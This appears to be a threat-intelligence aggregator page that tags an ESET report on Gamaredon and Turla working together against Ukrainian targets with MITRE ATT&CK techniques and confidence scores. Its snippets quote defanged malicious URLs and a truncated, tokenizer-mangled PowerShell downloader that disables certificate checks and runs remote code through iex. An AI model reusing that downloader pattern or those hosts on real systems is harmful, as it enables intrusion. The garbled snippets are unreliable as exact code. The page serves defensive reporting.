TTPwire Vol. 1 · MITRE ATT&CK·Tagged

← All stories

ESET WeLiveSecurity

Gamaredon X Turla collab

2025-09-19 · Read original ↗

ATT&CK techniques detected

4 predictions
T1059.001PowerShell
99%
“abrargeospatial [. ] ir / wp - includes / fonts / wp - icons / index. php - https : / / www. brannenburger - nagelfluh [. ] de / wp - includes / style - engine / css / index. php - https : / / www. pizzeria - mercy [. ] de / wp - includes / images / media / bar / index. php it is…”
T1059.001PowerShell
92%
“##eropaste was caught trying to execute the simple powershell script shown in figure 9. the base64 - encoded string is the following downloader in powershell : [ system. net. servicepointmanager ] : : servercertificatevalidationcallback = { $ true } ; iex ( new - object net. webc…”
T1055.001Dynamic-link Library Injection
59%
“is not clear to us why turla operators had to use pterographin to launch kazuar, but it is possible that kazuar somehow stopped working after the eset product installation and that they had to restart the implant. note that we didn ’ t see gamaredon downloading kazuar ; it was pr…”
T1105Ingress Tool Transfer
34%
“15 : 26 : 14 utc, we detected a pteroodd sample ( a gamaredon tool ) downloading a payload from https : / / api. telegra [. ] ph / getpage / scrsskjqwlbw - 02 - 28? return _ content = true. the downloaded script, shown in figure 8, is similar to the payload described in the first…”

Summary

Notorious APT group Turla collaborates with Gamaredon, both FSB-associated groups, to compromise high‑profile targets in Ukraine